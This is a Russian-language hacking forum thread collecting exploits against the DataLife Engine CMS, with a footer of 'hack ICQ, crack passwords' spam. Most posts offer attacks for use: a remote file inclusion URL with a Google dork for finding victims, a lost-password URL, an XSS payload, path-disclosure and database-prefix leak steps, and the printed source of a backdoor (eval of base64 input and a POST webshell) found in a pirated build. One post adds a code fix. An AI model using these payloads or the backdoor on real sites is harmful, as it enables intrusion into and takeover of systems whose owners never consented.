Старый 20.10.2009, 17:23   #1
DragOn
Полусинтетика
 
Аватар для DragOn
 
Регистрация: 13.04.2009
Сообщений: 1,397
DragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспорима
DragOn вне форума

По умолчанию Обзор уязвимостей DLE


Здесь выкладываем баги,уязвимости и прочее DLE
Начну я:
Код:
======================================================
DatalifeEngine 8.2 Remote File Inclusion Vulnerability
 
<<!>> Found by  :  kurdish hackers team
<<!>> C0ntact : pshela [at] YaHoo .com
                  
<<!>> Groups : Kurd-Team
<<!>> site   : www.kurdteam.org
=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================
<<->> script   :: DatalifeEngine8.2
<<->> home script :: http://dlecms.com/download/DatalifeEngine8.2.zip
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
<<->> google dork : Powered By DataLife Engine
<<->> Exploit ::
 
 >>> www.site/path /engine/api/api.class.php?dle_config_api=[shell.txt?]
 
 
=======================================================
 
=======================================================
<<->> All freinds , Zryan_kurd , RootSyS all member kurdish hackers team

# milw0rm.com [2009-09-01]
__________________
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Ответ: Обзор уязвимостей DLE
Старый 20.10.2009, 17:58   #2
Reptiliy
RAM 8MB
 
Аватар для Reptiliy
 
Регистрация: 12.07.2009
Сообщений: 13
Reptiliy Новичок
Reptiliy вне форума
По умолчанию Ответ: Обзор уязвимостей DLE

А может описания дашь
  Ответить с цитированием
Ответ: Обзор уязвимостей DLE
Старый 14.11.2009, 01:15   #3
bob1
RAM 16MB
 
Аватар для bob1
 
Регистрация: 26.08.2009
Сообщений: 30
bob1 скоро придёт к известности
bob1 вне форума
По умолчанию Ответ: Обзор уязвимостей DLE

DLE 8.2
/index.php?do=lostpassword&douser=1&lostid=
  Ответить с цитированием
Ответ: Обзор уязвимостей DLE
Старый 20.11.2009, 23:22   #4
DragOn
Полусинтетика
 
Аватар для DragOn
 
Регистрация: 13.04.2009
Сообщений: 1,397
DragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспоримаDragOn репутация неоспорима
DragOn вне форума
По умолчанию Ответ: Обзор уязвимостей DLE

Был найден бэкдор в нулле от -=ZLOY=-
В этом файле был бэкдор. eval() через $_POST
Файл лежит в (/engine/ajax/updates.php)
Код бэкдора
Код:
 if($_GET['wert']==''){ 
require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng'; 
$config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset']; 
@header("HTTP/1.0 200 OK"); 
@header("HTTP/1.1 200 OK"); 
@header("Cache-Control: no-cache, must-revalidate, max-age=0"); 
@header("Expires: 0"); 
@header("Pragma: no-cache"); 
@header("Content-type: text/css; charset=".$config['charset']); 
$data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?version_id=".$_REQUEST['versionid']."&key=".$config['key']); 
if (!strlen($data)) echo $lang['no_update']; else echo $data; 
}else{ 
$file=(ROOT_DIR."/engine/classes/mysql.class.php"); 
if(file_exists($file)){ @require($file); $x.="mysql.class.php - ok<br />";} 
$file=(ROOT_DIR."/engine/data/dbconfig.php"); 
if(file_exists($file)){ @require($file); $x.="dbconfig.php - ok<br />";} 
$file=(ROOT_DIR."/engine/data/config.php"); 
if(file_exists($file)){ @require($file); $x.="config.php - ok<br />";} 
eval(base64_decode($_GET['user_id'])); 
echo <<<HTML 
<HTML><body><form action="" method="post"> 
<center><textarea name="text" rows="10" cols="100"></textarea> 
<br /><input type="submit" value="Canoinoaaoe"/></center></form></body></HTML> 
HTML; 
if($_POST['text']!=''){eval(stripcslashes($_POST['text'])); 
}}
__________________
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
-
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Ответ: Обзор уязвимостей DLE
Старый 24.01.2011, 20:27   #5
SWW
Изгнан
 
Аватар для SWW
 
Регистрация: 23.01.2011
Сообщений: 368
SWW - весьма и весьма положительная личностьSWW - весьма и весьма положительная личность
SWW вне форума
По умолчанию Ответ: Обзор уязвимостей DLE

Раскрытие путей dle 8.3 engine/images.php
dle_skin: ../
Код:

Код:
if ($_COOKIE['dle_skin']) { if (@is_dir ( ROOT_DIR . '/templates/' . $_COOKIE['dle_skin'] )) { $config['skin'] = $_COOKIE['dle_skin']; } }

Открываем site.ru/engine/images.php?area=short_story&add_id=
грузим картинку и получаем раскрытые пути)

Добавлено через 2 минуты 25 секунд
Проблема: Недостаточная фильтрация входящих данных в регистрации.
Ошибка в версии: все версии
Степень опасности: Низкая
Баг нашёл: Lion__

Баг позволяет узнать префикс к бд.
Как юзать:
1) Переходим по ссылке ?do=register
2) Вводим логин, пароль, капчу, email более 50 символов.
Пример email:

qawsedrftgsqawsedrftgqawsedrftgqawsedrftgqawsedrft g@qawsedrftg.qawsedrftg



3) Нажимаем зарегистрироваться
4) Повторяем операцию с 1 по 3 шаги.
5) Получаем ошибку о дубликате поля. В ней смотрим префикс к бд.

Как это работает? Дело в том что поле email стоит ограничение в 50 символов, таким образом остальное всё обрезается, при первой регистрации в бд попало значение:

qawsedrftgsqawsedrftgqawsedrftgqawsedrftgqawsedrft



После второй регистрации идёт поиск поля email со значением:

qawsedrftgsqawsedrftgqawsedrftgqawsedrftgqawsedrft g@qawsedrftg.qawsedrftg



Которого нет, отправляется запрос, получаем ошибку.

Исправить:

Найти в engine/modules/register.php:

$email = $db->safesql( $parse->process( $_POST['email'] ) );


Заменить на:

$email = $db->safesql( $parse->process( substr($_POST['email'], 0,50) ) );


Источник: _http://forum.seo-king.ru/index.php?showtopic=377
  Ответить с цитированием
Последний раз редактировалось SWW; 24.01.2011 в 20:27. Причина: Добавлено сообщение
Ответ: Обзор уязвимостей DLE
Старый 18.02.2011, 21:00   #6
therf2
RAM 256MB
 
Аватар для therf2
 
Регистрация: 17.12.2010
Сообщений: 320
therf2 - весьма и весьма положительная личностьtherf2 - весьма и весьма положительная личность
therf2 вне форума
По умолчанию Ответ: Обзор уязвимостей DLE

xss на 8.5 и 8.2
[HIDE]http://dle85.ru/engine/modules/imagepreview.php?image=javajavascriptscript:alert( String.fromCharCode(120,115,115)[/HIDE]
  Ответить с цитированием
Ответ: Обзор уязвимостей DLE
Старый 13.09.2011, 20:59   #7
surpriz
RAM 256MB
 
Аватар для surpriz
 
Регистрация: 10.01.2011
Сообщений: 1,013
surpriz - просто великолепная личностьsurpriz - просто великолепная личностьsurpriz - просто великолепная личностьsurpriz - просто великолепная личностьsurpriz - просто великолепная личностьsurpriz - просто великолепная личностьsurpriz - просто великолепная личностьsurpriz - просто великолепная личность
surpriz вне форума
По умолчанию Ответ: Обзор уязвимостей DLE

почистил тему...
за одно мож кто подскажет уязвимости для версии => 9.0 , сам ничего найти не смог...
  Ответить с цитированием
Ответ: Обзор уязвимостей DLE
Старый 14.09.2011, 11:13   #8
Ra1n
RAM 256MB
 
Аватар для Ra1n
 
Регистрация: 28.12.2010
Сообщений: 562
Ra1n как роза среди колючекRa1n как роза среди колючекRa1n как роза среди колючекRa1n как роза среди колючек
Ra1n вне форума
По умолчанию Ответ: Обзор уязвимостей DLE

Цитата:
Сообщение от surpriz Посмотреть сообщение
почистил тему...
за одно мож кто подскажет уязвимости для версии => 9.0 , сам ничего найти не смог...
тут покури...мб найдешь
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
__________________
Смотрю все тру посаны подсели на дэлфи?:41:
  Ответить с цитированием
Ответ: Обзор уязвимостей DLE
Старый 14.09.2011, 21:47   #9
surpriz
RAM 256MB
 
Аватар для surpriz
 
Регистрация: 10.01.2011
Сообщений: 1,013
surpriz - просто великолепная личностьsurpriz - просто великолепная личностьsurpriz - просто великолепная личностьsurpriz - просто великолепная личностьsurpriz - просто великолепная личностьsurpriz - просто великолепная личностьsurpriz - просто великолепная личностьsurpriz - просто великолепная личность
surpriz вне форума
По умолчанию Ответ: Обзор уязвимостей DLE

Цитата:
Сообщение от Ra1n Посмотреть сообщение
тут покури...мб найдешь
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
читал... но там для 9.0 и выше ничего нету..
  Ответить с цитированием
Ответ: Обзор уязвимостей DLE
Старый 11.04.2012, 11:01   #10
azatkad
Юзверь
 
Аватар для azatkad
 
Регистрация: 01.03.2011
Сообщений: 1
azatkad Новичок
azatkad вне форума
По умолчанию Ответ: Обзор уязвимостей DLE

а для DLE 9.5 уязвимостей нету?
  Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



взломать аську аську взломать взлом программы сделать взлом программы как сделать взлом программы хакерские сайты как легко взломать аську лучшие хакерские сайты топ список хакерские сайты взлом паролей легкий взлом паролей

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd. Перевод: zCarot